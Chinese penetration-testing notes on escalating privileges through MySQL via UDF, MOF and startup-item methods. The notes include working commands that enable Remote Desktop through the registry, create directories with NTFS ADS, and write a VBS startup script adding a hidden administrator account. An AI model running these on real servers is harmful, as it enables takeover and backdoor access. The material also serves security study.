渗透测试之提权(udf提权+mof提权+启动项提权)1.  提权
低权限给⾼权限去提取(你已经获得⼀定的权限)
Windows  ⼀般⽤户  系统⽤户  管理员  system
Linux  普通⽤户  系统⽤户  root
2.  udf提权
1、其利⽤条件是⽬标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个⽤户账号,此账号必须有对mysql的insert和delete
权限以创建和抛弃函数,有root账号密码。
2、Mysql版本⼤于5.1版本udf.dll⽂件必须放置于MYSQL安装⽬录下的lib\plugin⽂件夹下。
3、Mysql版本⼩于5.1版本。udf.dll⽂件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\
system32。
4、掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,⼀般以root账号为佳,具备`root账号所具备的权限
的其它账号也可以。
利⽤菜⼑⼯具上传udf.php的提权⽂件到靶机www的⽬录下 靶机需要有PHPStudy
利⽤url访问靶机的udf.php⽂件
查看数据库⽤户名和密码
导出⽂件(必须存在该⽬录 否则报错)  ⾃⼰建⽴⼀个plugin⽂件夹  secure_file_priv的值为空
利⽤⾃带命令查看⽤户
mysql下载到了c盘
⾃定义SQL语句
select cmdshell('REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f');    //对xp和200 为什么 webshell的权限是administrator 使⽤udf提权之后 还是administrator
是因为是administrator启动的apache和mysql
这⾥需要强调⼀下,是什么问题:
⼀般Lib、Plugin⽂件夹需要⼿⼯建⽴(也可⽤NTFS ADS流模式突破进⽽创建⽂件夹)
select @@basedir; //查到mysql的⽬录
select 'It is dll' into dumpfile 'C:\\ProgramFiles\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';
//利⽤NTFS ADS创建lib⽬录
select 'It is dll' into dumpfile 'C:\\ProgramFiles\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';
//利⽤NTFS ADS创建plugin⽬录
3.  mof提权
利⽤了c:/windows/system32/wbem/mof/⽬录下的 f ⽂件,每分钟都会在⼀个特定的时间去执⾏⼀次的特性,来写⼊我们的cmd命令使其被带⼊执⾏。
使⽤MOF提权的前提是当前root账户可以复制⽂件到%SystemRoot%\System32\Wbem\MOF⽬录下。
Win2003  由于mof⽬录直接⽆法写⼊ 为了⽅便测试 选择写⼊c盘然后拖到⽬录下
在之前必须没有admin⽤户才能成功
4.  启动项提权  secure_file_priv的值不为空
写⼊⼀段VBS代码到开机⾃启动中,服务器重启达到创建⽤户并提权,可以使⽤win2003的 rdp DOS迫使服务器重启。1,开始菜单当前⽤户启动⽂件夹--
C:\Users\⽤户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2,开始菜单所有⽤户启动⽂件夹--
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
3,注册表当前⽤户开机启动项⽬录--
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
4,注册表所有⽤户开机启动项⽬录--
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
create table a (cmd text);
insert into a values ("set wshshell=createobject(""wscript.shell"") " );
insert into a values ("a=wshshell.run("" /c net user hpdoger 123456 /add"",0) " );
insert into a values ("b=wshshell.run("" /c net localgroup administrators hpdoger/add"",0) " );
select * from a into outfile "C:\\Documents andSettings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
写⼊⽂件报错 修改配置⽂件也⽆法写⼊
只能修改写⼊⽂件的路径

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。